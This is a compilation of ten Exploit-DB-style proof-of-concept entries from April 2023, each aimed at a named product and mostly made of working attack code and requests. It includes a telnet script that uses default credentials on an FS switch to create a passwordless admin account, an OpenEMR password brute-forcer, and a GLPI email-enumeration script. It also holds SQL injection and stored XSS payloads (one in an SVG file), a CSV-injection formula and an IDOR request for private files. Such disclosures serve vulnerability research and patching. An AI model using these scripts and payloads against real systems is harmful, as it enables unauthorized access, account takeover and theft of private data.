<pre><code># Exploit Title: FS-S3900-24T4S Privilege Escalation<br /># Date: 29/04/2023<br /># Exploit Author: Daniele Linguaglossa & Alberto Bruscino<br /># Vendor Homepage: https://www.fs.com/<br /># Software Link: not available<br /># Version: latest<br /># Tested on: latest<br /># CVE : CVE-2023-30350<br /><br />import sys<br />import telnetlib<br /><br /><br />def exploit(args):<br /> print(args)<br /> if len(args) != 1:<br /> print(f"Usage: {sys.argv[0]} <ip>")<br /> sys.exit(1)<br /> else:<br /> ip = args[0]<br /> try:<br /> with telnetlib.Telnet(ip, 23) as tn:<br /> try:<br /> tn.read_until(b"Username: ")<br /> tn.write(b"guest\r\n")<br /> tn.read_until(b"Password: ")<br /> tn.write(b"guest\r\n")<br /> tn.read_until(b">")<br /> tn.write(b"enable\r\n")<br /> tn.read_until(b"Password: ")<br /> tn.write(b"super\r\n")<br /> tn.read_until(b"#")<br /> tn.write(b"configure terminal\r\n")<br /> tn.read_until(b"(config)#")<br /> tn.write(b"username admin nopassword\r\n")<br /> tn.read_until(b"(config)#")<br /> print(<br /> "Exploit success, you can now login with username: admin and password: <empty>")<br /> tn.close()<br /> except KeyboardInterrupt:<br /> print("Exploit failed")<br /> tn.close()<br /> except ConnectionRefusedError:<br /> print("Connection refused")<br /><br /><br />if __name__ == "__main__":<br /> exploit(sys.argv[1:])<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force<br /># Date: 2023-04-28<br /># Exploit Author: abhhi (Abhishek Birdawade)<br /># Vendor Homepage: https://www.open-emr.org/<br /># Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz<br /># Version: 7.0.1<br /># Tested on: Windows<br /><br />'''<br />Example Usage:<br />- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt <br />'''<br /><br />import requests<br />import sys<br />import argparse, textwrap<br />from pwn import *<br /><br />#Expected Arguments<br />parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, <br />epilog=textwrap.dedent(''' <br />Exploit Usage : <br />python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt<br />python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt<br />python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt''')) <br /><br />parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") <br />parser.add_argument("-u","--username", help="Username to Bruteforce for.")<br />parser.add_argument("-ul","--userlist", help="Username Dictionary") <br />parser.add_argument("-p","--passlist", help="Password Dictionary") <br />args = parser.parse_args()<br /><br />if len(sys.argv) < 2:<br /> print (f"Exploit Usage: python3 exploitBF.py -h") <br /> sys.exit(1) <br /><br /># Variable<br />LoginPage = args.url<br />Username = args.username<br />Username_list = args.userlist<br />Password_list = args.passlist<br /><br />log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')<br /><br />def login(Username,Password):<br /> session = requests.session() <br /> r = session.get(LoginPage)<br /> <br /># Progress Check <br /> process = log.progress('Brute Force')<br /><br />#Specifying Headers Value<br /> headerscontent = {<br /> 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',<br /> 'Referer' : f"{LoginPage}",<br /> 'Origin' : f"{LoginPage}",<br /> }<br /><br />#POST REQ data<br /> postreqcontent = {<br /> 'new_login_session_management' : 1,<br /> 'languageChoice' : 1,<br /> 'authUser' : f"{Username}",<br /> 'clearPass' : f"{Password}"<br /> }<br /><br />#Sending POST REQ<br /> r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)<br /><br />#Printing Username:Password <br /> process.status('Testing -> {U}:{P}'.format(U = Username, P = Password)) <br /><br />#Conditional loops <br /> if 'Location' in r.headers:<br /> if "/interface/main/tabs/main.php" in r.headers['Location']:<br /> print()<br /> log.info(f'SUCCESS !!')<br /> log.success(f"Use Credential -> {Username}:{Password}")<br /> sys.exit(0)<br /> <br />#Reading User.txt & Pass.txt files<br />if Username_list:<br /> userfile = open(Username_list).readlines()<br /> for Username in userfile:<br /> Username = Username.strip() <br /><br />passfile = open(Password_list).readlines()<br />for Password in passfile:<br /> Password = Password.strip() <br /> login(Username,Password)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection<br /># Date: 2023-04-29<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://www.phpjabbers.com/faq.php<br /># Software Link: https://www.phpjabbers.com/simple-cms/<br /># Version: 5.0<br /># Tested on: Kali Linux<br /><br />### Request ###<br /><br />GET<br />/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10<br />HTTP/1.1<br />Accept: */*<br />x-requested-with: XMLHttpRequest<br />Referer: https://localhost/simplecms/preview.php?lid=1<br />Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;<br />_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;<br />pjd_simplecms=1; last_position=%2F<br />Accept-Encoding: gzip,deflate,br<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36<br />Host: localhost<br />Connection: Keep-alive<br /><br />### Parameter & Payloads ###<br /><br />Parameter: column (GET)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)<br />THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)<br />END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10<br /><br /> Type: error-based<br /> Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (EXTRACTVALUE)<br /> Payload: action=pjActionGetFile&column=2 AND<br />EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT<br />(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10<br /><br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)<br /># Date: 2023-04-29<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://www.phpjabbers.com/faq.php<br /># Software Link: https://www.phpjabbers.com/simple-cms/<br /># Version: 5.0<br /># Tested on: Kali Linux<br /><br />### Steps to Reproduce ###<br /><br />- Please login from this address:<br />https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin<br />- Click on the "Add Section" button.<br />- Then enter the payload ("><img src=x onerror=alert("Stored")>) in the<br />"Section" box and save it.<br />- Boom! An alert message saying "Stored" will appear in front of you.<br /><br />### PoC Request ###<br /><br />POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate<br />HTTP/1.1<br />Host: localhost<br />Cookie: pj_sid=PJ1.0.6199026527.1682777172;<br />pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1;<br />PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1;<br />pjd=7l9bb4ubmknrdbns46j7g5cqn7<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 371<br />Origin: https://localhost<br />Referer:<br />https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br />Connection: close<br /><br />section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T<br /><br /></code></pre>
<pre><code>Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)<br />Application: PHPFusion<br />Version: 9.10.30<br />Bugs: XSS<br />Technology: PHP<br />Vendor URL: https://www.php-fusion.co.uk/home.php<br />Software Link: https://sourceforge.net/projects/php-fusion/<br />Date of found: 28-04-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw)<br />2. upload malicious svg file<br /><br />svg file content ===><br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br /><br /><br />poc request:<br /><br /><br />POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1<br />Host: localhost<br />Content-Length: 1198<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-platform: "Linux"<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA<br />Accept: */*<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0<br />Connection: close<br /><br />------WebKitFormBoundaryxF2jB690PpLWInAA<br />Content-Disposition: form-data; name="reqid"<br /><br />187c77be8e52cf<br />------WebKitFormBoundaryxF2jB690PpLWInAA<br />Content-Disposition: form-data; name="cmd"<br /><br />upload<br />------WebKitFormBoundaryxF2jB690PpLWInAA<br />Content-Disposition: form-data; name="target"<br /><br />l1_Lw<br />------WebKitFormBoundaryxF2jB690PpLWInAA<br />Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"<br /><br />SVG_XSS.svg<br />------WebKitFormBoundaryxF2jB690PpLWInAA<br />Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />------WebKitFormBoundaryxF2jB690PpLWInAA<br />Content-Disposition: form-data; name="mtime[]"<br /><br />1681116842<br />------WebKitFormBoundaryxF2jB690PpLWInAA<br />Content-Disposition: form-data; name="overwrite"<br /><br />0<br />------WebKitFormBoundaryxF2jB690PpLWInAA--<br /><br /><br />3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file(<br />http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg)<br /><br /><br /><br />poc video : https://youtu.be/6yBLnRH8pOY<br /><br /></code></pre>
<pre><code># Exploit Title: GLPI 9.5.7 - Username Enumeration<br /># Date: 04/29/2023<br /># Author: Rafael B.<br /># Vendor Homepage: https://glpi-project.org/pt-br/<br /># Affected Versions: GLPI version 9.1 <= 9.5.7<br /># Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz<br /><br /><br />import requests<br />from bs4 import BeautifulSoup<br /><br /># Send a GET request to the page to receive the csrf token and the cookie session<br />response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')<br /><br /># Parse the HTML using BeautifulSoup<br />soup = BeautifulSoup(response.content, 'html.parser')<br /><br /># Find the input element with the CSRF token<br />csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})<br /><br /># Extract the CSRF token if it exists<br />if csrf_input:<br /> csrf_token = csrf_input['value']<br /><br /># Extract the session cookie<br />session_cookie_value = None<br />if response.cookies:<br /> session_cookie_value = next(iter(response.cookies.values()))<br /># Set the custom url where the GLPI recover password is located <br />url = "http://127.0.0.1:80/glpi/front/lostpassword.php"<br />headers = {"User-Agent": "Windows NT 10.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}<br /><br /># Open the email list file and read each line<br />with open('emails.txt', 'r') as f:<br /> email_list = f.readlines()<br /><br /># Loop through the email list and make a POST request for each email<br />for email in email_list:<br /> email = email.strip()<br /> data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token}<br /> cookies = {"glpi_f6478bf118ca2449e9e40b198bd46afe": session_cookie_value}<br /> freq = requests.post(url, headers=headers, cookies=cookies, data=data)<br /><br /> # Do a new GET request to get the updated CSRF token and session cookie for the next iteration<br /> response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')<br /> soup = BeautifulSoup(response.content, 'html.parser')<br /> csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})<br /> if csrf_input:<br /> csrf_token = csrf_input['value']<br /> session_cookie_value = None<br /> if response.cookies: <br /> session_cookie_value = next(iter(response.cookies.values()))<br /><br /> # Parse the response and grep the match e-mails<br /> soup = BeautifulSoup(freq.content, 'html.parser')<br /> div_center = soup.find('div', {'class': 'center'})<br /> Result = (f"Email: {email}, Result: {div_center.text.strip()}")<br /> if "An email has been sent to your email address. The email contains information for reset your password." in Result:<br /> print ("\033[1;32m Email Found! -> " + Result)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path<br /># Date: 2023-04-23<br /># CVE: CVE-2023-2417<br /># Exploit Author: MrEmpy<br /># Vendor Homepage: https://www.ks-soft.net<br /># Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm<br /># Version: > 12.56<br /># Tested on: Windows 10 21H2<br /><br /><br />Title:<br />================<br />Advanced Host Monitor > 12.56 - Unquoted Service Path<br /><br /><br />Summary:<br />================<br />An unquoted service path vulnerability has been discovered in Advanced Host<br />Monitor version > 12.56 affecting the executable "C:\Program Files<br />(x86)\HostMonitor\RMA-Win\rma_active.exe" . This vulnerability occurs when<br />the service's path is misconfigured, allowing an attacker to run a<br />malicious file instead of the legitimate executable associated with the<br />service.<br /><br />An attacker with local user privileges could exploit this vulnerability to<br />replace the legitimate RMA-Win\rma_active.exe service executable with a<br />malicious file of the same name and located in a directory that has a<br />higher priority than the legitimate directory. That way, when the service<br />starts, it will run the malicious file instead of the legitimate<br />executable, allowing the attacker to execute arbitrary code, gain<br />unauthorized access to the compromised system, or stop the service from<br />functioning.<br /><br />To exploit this vulnerability, an attacker would need local access to the<br />system and the ability to write and replace files on the system. The<br />vulnerability can be mitigated by correcting the service path to correctly<br />quote the full path of the executable, including quotation marks.<br />Furthermore, it is recommended that users keep software updated with the<br />latest security updates and limit physical and network access to their<br />systems to prevent malicious attacks.<br /><br /><br />Proof of Concept:<br />================<br /><br />C:\>sc qc ActiveRMAService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ActiveRMAService<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files<br />(x86)\HostMonitor\RMA-Win\rma_active.exe /service<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : KS Active Remote Monitoring Agent<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>
<pre><code>Exploit Title: admidio v4.2.5 - CSV Injection<br />Application: admidio<br />Version: 4.2.5<br />Bugs: CSV Injection<br />Technology: PHP<br />Vendor URL: https://www.admidio.org/<br />Software Link: https://www.admidio.org/download.php<br />Date of found: 26.04.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Windows<br /><br /><br />2. Technical Details & POC<br />========================================<br />Step 1. login as user<br />step 2. Go to My profile (edit profile) and set postal code as =calc|a!z| and save (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2)<br />step 3. If admin Export users as CSV or excell file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admidio/adm_program/modules/groups-roles/lists_show.php?rol_ids=2)<br /><br />payload: =calc|a!z|<br /><br />Poc video: https://www.youtube.com/watch?v=iygwj1izSMQ<br /><br /></code></pre>
<pre><code>Exploit Title: revive-adserver v5.4.1 - Cross-Site Scripting (XSS)<br />Application: revive-adserver<br />Version: 5.4.1<br />Bugs: XSS<br />Technology: PHP<br />Vendor URL: https://www.revive-adserver.com/<br />Software Link: https://www.revive-adserver.com/download/<br />Date of found: 31-03-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1. Go to create banner<br />2. select the advanced section <br />3. Write this payload in the prepend and append parameters (%3Cscript%3Ealert%281%29%3C%2Fscript%3E) <br /><br />POST /www/admin/banner-advanced.php HTTP/1.1<br />Host: localhost<br />Content-Length: 213<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: sessionID=5224583cf474cd32d2ef37171c4d7894<br />Connection: close<br /><br />clientid=3&campaignid=2&bannerid=2&token=94c97eabe1ada8e7ae8f204e2ebf7180&prepend=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&append=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitbutton=De%C4%9Fi%C5%9Fiklikleri+Kaydet<br /><br /><br /><br />We are sending this link to the admin. then if admin clicks it will be exposed to xss<br /><br />http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2<br /><br /></code></pre>
<pre><code>Exploit Title: projectSend r1605 - Private file download<br />Application: projectSend<br />Version: r1605<br />Bugs: IDOR<br />Technology: PHP<br />Vendor URL: https://www.projectsend.org/<br />Software Link: https://www.projectsend.org/<br />Date of found: 24-01-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br /><br />Technical Details & POC<br />========================================<br /><br />1.Access to private files of any user, including admin<br /><br /><br />just change id<br /><br /><br /><br />GET /process.php?do=download&id=[any user's private pictures id] HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/manage-files.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: download_started=false; PHPSESSID=e46dtgmf95uu0usnceebfqbp0f<br />Connection: close<br /><br /></code></pre>